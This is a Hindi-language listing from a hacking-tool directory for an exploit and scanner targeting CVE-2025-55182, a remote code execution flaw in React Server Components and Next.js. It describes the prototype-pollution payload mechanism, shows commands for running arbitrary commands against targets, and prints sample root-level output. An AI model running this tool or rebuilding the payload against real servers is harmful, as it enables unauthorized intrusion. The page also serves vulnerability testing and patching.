Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 - React सर्वर घटक RCE शोषण और स्कैनर बाहरी सर्वर और CLI इंटरफ़ेस का समर्थन करता है | Kitploit
उपकरण/GitHubGitHub/sickwell/cve-2025-55182
भेद्यता स्कैनरकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubsickwell/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 - React सर्वर घटक RCE शोषण और स्कैनर बाहरी सर्वर और CLI इंटरफ़ेस का समर्थन करता है

रिपॉजिटरी देखें
13619 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 - React और Next.js सर्वर एक्शन RCE एक्सप्लॉइट

React/Next.js सर्वर एक्शन में CVE-2025-55182 के लिए पूर्ण-सुविधाओं वाला रिमोट कोड निष्पादन एक्सप्लॉइट और स्कैनर।

मूल PoC: Spritualkb/CVE-2025-55182-exp

अवलोकन

CVE-2025-55182 React सर्वर कम्पोनेंट्स में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता है जो रिमोट कोड निष्पादन की अनुमति देती है। यह रिपॉजिटरी स्वचालित स्कैनिंग (Nuclei टेम्पलेट) और मैन्युअल शोषण (Python स्क्रिप्ट) दोनों टूल प्रदान करती है।

भेद्यता तंत्र:

यह एक्सप्लॉइट React फ्लाइट प्रोटोकॉल डिसीरियलाइज़ेशन में प्रोटोटाइप प्रदूषण का लाभ उठाता है। यह "$1:__proto__:then" के माध्यम से Object.prototype.then को प्रदूषित करता है और _formData.get को "$1:constructor:constructor" पर सेट करके Function कंस्ट्रक्टर तक पहुँच प्राप्त करता है, फिर _prefix के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट करता है जो Function() द्वारा निष्पादित होता है।

उपकरण

1. Nuclei टेम्पलेट (cve-2025-55182.yaml)

स्वचालित भेद्यता स्कैनर जो id कमांड निष्पादित करता है और X-Action-Redirect हेडर के माध्यम से आउटपुट प्राप्त करता है।

उपयोग:

root@kitploit:~
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml

विशेषताएँ:

  • RCE सत्यापित करने के लिए परीक्षण कमांड (id) निष्पादित करता है
  • प्रतिक्रिया हेडर से कमांड आउटपुट निकालता है
  • एकाधिक पहचान संकेतक (स्थिति 303, रीडायरेक्ट हेडर, त्रुटि पैटर्न)

2. Python RCE एक्सप्लॉइट (CVE-2025-55182.py)

पूर्ण-सुविधाओं वाली RCE एक्सप्लॉइट स्क्रिप्ट जो मनमानी कमांड निष्पादित करती है और आउटपुट प्राप्त करती है।

उपयोग:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

विशेषताएँ:

  • मनमानी कमांड निष्पादित करें
  • X-Action-Redirect हेडर से स्वचालित आउटपुट निष्कर्षण
  • HTTP/HTTPS और IP:PORT प्रारूपों का समर्थन
  • SSL प्रमाणपत्र सत्यापन बाईपास विकल्प
  • साफ, स्वरूपित आउटपुट

परीक्षण परिणाम

Nuclei टेम्पलेट

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python एक्सप्लॉइट

root@kitploit:~
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"

============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================

[*] Target: http://localhost:3001
[*] Command: id
[*] Building payload...
[*] Sending exploit payload...

============================================================
[+] Command executed successfully!
============================================================
[+] Command Output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------

============================================================
[*] Exploitation attempt completed
============================================================

प्रभावित संस्करण

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (सर्वर एक्शन के साथ ऐप राउटर)

श्रेय

  • मूल PoC: Spritualkb - CVE-2025-55182-exp

संदर्भ

  • React सुरक्षा सलाहकार
  • Next.js GitHub

अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए

टूल डाउनलोड करें